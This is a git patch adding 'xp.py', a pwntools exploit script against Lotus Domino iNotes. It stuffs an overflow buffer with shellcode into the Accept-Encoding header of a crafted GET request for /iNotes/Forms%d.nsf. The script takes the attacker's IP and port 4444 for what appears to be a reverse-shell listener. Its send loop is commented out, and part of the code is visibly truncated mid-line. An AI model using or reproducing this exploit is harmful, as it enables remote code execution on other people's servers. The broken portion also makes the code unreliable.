From ed07cc9ae8972abbea7dffc86892b9f5a4a142f9 Mon Sep 17 00:00:00 2001 From: evan <1+e@noreply.gitea.im0.zenith.hosting> Date: Fri, 19 Jun 2026 04:30:25 +0000 Subject: [PATCH] Add xp.py --- xp.py | 77 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 77 insertions(+) create mode 100644 xp.py diff --git a/xp.py b/xp.py new file mode 100644 index 0000000..f1faa89 --- /dev/null +++ b/xp.py @@ -0,0 +1,77 @@ +from pwn import * +import struct +import sys + +def pack(x): + return struct.pack(' offset): + # print("shellcode is too large") + # import sys; sys.exit(1) + niceone += shellcode + print("+ len is", len(niceone)) + + currsize = len(niceone)-offset + print(f"+ curr: {currsize}") + + + with open("payload.bin", "wb") as f: + f.write(niceone) + + request = b'GET /iNotes/Forms%d.nsf// HTTP/1.0\r\n' + request += f'Host: {host}\r\n'.encode() + request += b'Accept-Encoding: ' + niceone + b'\r\n' + request += b'Connection: Close\r\n' + request += b'Cache-Control: no-cache\r\n\r\n' + print("+ sending") + #for i in range(10): + # conn = remote(host.format(i), port) + # conn.send(request) + # conn.close() + print("+ check your listener") + +if __name__ == '__main__': + if len(sys.argv) < 5: + print(f"xp 4444") + sys.exit(1) + + host = sys.argv[1] + port = int(sys.argv[2]) + yourip = sys.argv[3] + # yourport = int(sys.argv[4]) + yourport = 4444 + clap(host, port, yourip, yourport)